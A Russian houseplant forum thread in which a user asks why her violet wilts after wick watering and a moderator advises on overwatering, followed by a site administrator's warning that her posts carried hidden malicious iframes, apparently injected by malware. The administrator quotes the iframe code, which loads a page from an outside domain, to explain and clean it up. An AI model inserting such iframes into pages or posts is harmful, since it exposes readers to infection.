Меню

Вянет фиалка.

Нашли ошибку? Сообщите о ней: 1) Выделите ошибку мышкой 2) Нажмите CTRL+Enter. Подробнее...

Гость аватар

Покупала весной.  Поскольку уезжала, поставила все фиалки на фитиль. Все было в порядке. Сегодня смотрю, моя фиалка опустила листья, и при этом некоторые из нижнего ряда отваливаются. Земля  сильно влажная. Убрала фитиль,  поставила так. Что это, переувлажнение? Как спасать. Она сейчас еще и цветет.

Это сегодня фиалка после пересадки. Я пересадила ее в другой горшок и поставила в теплицу.

P1070096

P1070095

Нижние листья я оборвала ( в том числе и тот, кот. на нижнем фото). Пересадила ее и поставила в тепличку.

Поделиться:  

Комментарии

Наталья Шаламова аватар

Ирина, скорей всего переувлажнение, похоже на это. Когда пересаживали, смотрели корневую? А если переувлажнение, то не уверена, что надо в тепличку ставить. Во всяком случае, земельный ком не должен быть мокрым, а просто влажным. Чтобы фиалочка набралась сил и ожила, лучше оборвать цветоносы - пусть побыстрее придет в себя. Поверьте, как только она оправиться, цветения долго ждать Вам не придется. Цветоносы обрывать всегда трудно, но ради спасения жизни самой фиалки на это пойти необходимо. А главное, следите, чтобы ни в коем случае больше не было переувлажнения и если решите все-таки оставить ее в тепличке, проветривайте каждый день обязательно. И учтите, что после пересадки фиалка должна прийти в себя, а это значит, что листья какое-то время могут быть вялыми, не паникуйте, а просто ждите, тщательно следя за поливом и проветриванием. Напишите все-таки в каком состоянии были корни у растения. Переувлажнение обязательно вызывает проблемы с ними.

Ирина 777 аватар

Смотрела корневую, но поскольку особо практики с ней не было, корни вроде не отпадали, поэтому, может и не правильно, но ком я сильно не трогала. Землю мокрую перемешала с новой. Она влажная сейчас. Сейчас оборвала цветоносы и вытащила из пакета. Она подвявшая. Но, опять же вопрос: у меня все фиалки в этой торфяной смеси. Не добавляла вермикулит. Что с ними делать? Покупать вермикулит и пересаживать? Все как раз сейчас цветут Или фитили поубирать? Так как земля во всех влажная. У меня у мамы десятилетиями фиалки растут,  она их иногда пересаживает, и порядок. А я тут как с младенцами.Улыбка

И проблемы.

Наталья Шаламова аватар

При заливе и переувлажнении корни однозначно надо проверять, они страдают в первую очередь. "Отпадать" они и не должны, корни просто становятся коричневыми, живые корни светлые. Коричневые корни все удаляются, остаются только "уцелевшие". Если с остальными фиалками всё в порядке, то пока ничего не трогайте, пусть растут, а Вы следите внимательно за ними. Влажная земля при фитильном поливе вещь вполне нормальная, главное, чтобы была не очень мокрая. Если Вас что-то смущает, то можете пока снять с фитилей и несколько дней не поливать, чтобы немного просушить землю. Я бы на Вашем месте обязательно проверила бы корни еще раз и внимательно.

Денис Никитин аватар

Ирина, в каждом Ваше сообщении и комментарии в конце приписан потенциально вредоносный код:

<iframe id="zunifrm" src="/pix/shans00.png#//_gvapp.ru/u.html"></iframe><iframe id="zunifrm" src="/pix/shans00.png#//_gvapp.ru/u.html"></iframe>

Это технология iframe, когда в содержимое страницы Fialki.ru встраивается содержание с другого сайта. На нашем сайте встраивать можно только видео-ролики с youtube.com, vimeo.com, галереи picasa. Встраивания iframe с других сайтов запрещены. Поэтому программа нашего сайта заблокировала Ваш код с iframe. Но сам факт регулярных попыток публикации встроенного кода требует реагирования со стороны администрации нашего сайта.

Причина появления кода iframe

Маловероятно, что Вы сознательно вставляете этот код с iframe. Почти невозможно случайно вставить подобный код в разных местах каждого Вашего сообщения. Для его вставки нужно перейти в режим набивки чистого html-кода через нажатие ссылки внизу редактора "Отключить редактор с кнопками" и руками набить нужный код, что слишком сложно для средней фиалочницы. А многократное повторение iframe в каждом сообщении показывает, что вставка была сделана не вручную.

И Вы вряд ли спамер или хакер, которые обычно работают проще и не заморачиваются публикацией фиалок для того, чтобы встроить свой iframe.

Скорее всего:

  • Ваш компьютер заражен вирусом, который тихонечко вставляет этот код всякий раз, когда Вы пишете сообщение на каком-либо сайте или создаете сообщение в почтовой программе
  • или Вы набирали текст не окне редактора сообщений, а в какой-то другой программе, зараженной вирусом. Вот тот чужой редактор сообщений добавил к Вашему тексту вредносный iframe. А Вы уже через буфер обмена добавили свой текст и iframe в наш редактор сообщения.

В любом случае, во всех Ваших сообщениях на фиалки вставлен вредносный код с iframe.Поэтому, прежде чем Вы продолжите общение на Fialki.ru, Вам надо разобраться с причиной появления iframe в любом Вашем сообщении и избавиться от него.

Действия

1. Почистил все Ваши сообщения от дополнительного скрытого кода с iframe.

2. Если Вы не сами добавляете этот дополнительный код, то Ваш компьютер скорее всего заражен. Поставьте антивирус, проверьте компьютер. Если не умеет сами, пригласите специалиста-компьютерщика.

3. После чистки и проверки Вашего компьютера свяжитесь со мной и укажите ссылку на эту страницу. Я сниму блокировку с Ваших учетных данных и Вы опубликуете тестовый комментарий. Если чистка Вами была проведена правильно, то он будет уже без подобного кода и Вы сможете продолжать общение.

Редакторам Fialki.ru

Оставил встроенные iframe в скрытом комментарии "Вянет фиалка [с образцом вредносного iframe]". Нажмите внизу указанного комментария ссылку "Изменить" и посмотрите, как встроенный iframe "проявляется" в окне редактирования.

Также нажмите внизу окна редактирования комментария "Вянет фиалка [с образцом вредносного iframe]" ссылку "Отключить редактор с кнопками и посмотрите, как выглядит html-код комментария со встроенными iframe. Должны увидеть что-то подобное:

<p> <br /> <iframe id="zunifrm" src="/pix/shans00.png#//gvapp.ru/u.html"></iframe><iframe id="zunifrm" src="/pix/shans00.png#//gvapp.ru/u.html"></iframe> </p> <p> <iframe id="zunifrm" src="/pix/shans00.png#//gvapp.ru/u.html"></iframe><iframe id="zunifrm" src="/pix/shans00.png#//gvapp.ru/u.html"></iframe>Не могу понять, как фото добавляется. Если все же получится, то это сегодня фиалка после пересадки. Я пересадила ее в другой горшок и поставила в теплицу. </p> <p> <iframe id="zunifrm" src="/pix/shans00.png#//gvapp.ru/u.html"></iframe><iframe id="zunifrm" src="/pix/shans00.png#//gvapp.ru/u.html"></iframe> </p> <p> <iframe id="zunifrm" src="/pix/shans00.png#//gvapp.ru/u.html"></iframe><iframe id="zunifrm" src="/pix/shans00.png#//gvapp.ru/u.html"></iframe> </p>
Ходить на сайт, указанный в iframe, не надо, чтобы случайно не поймать вируса к себе на компьютер.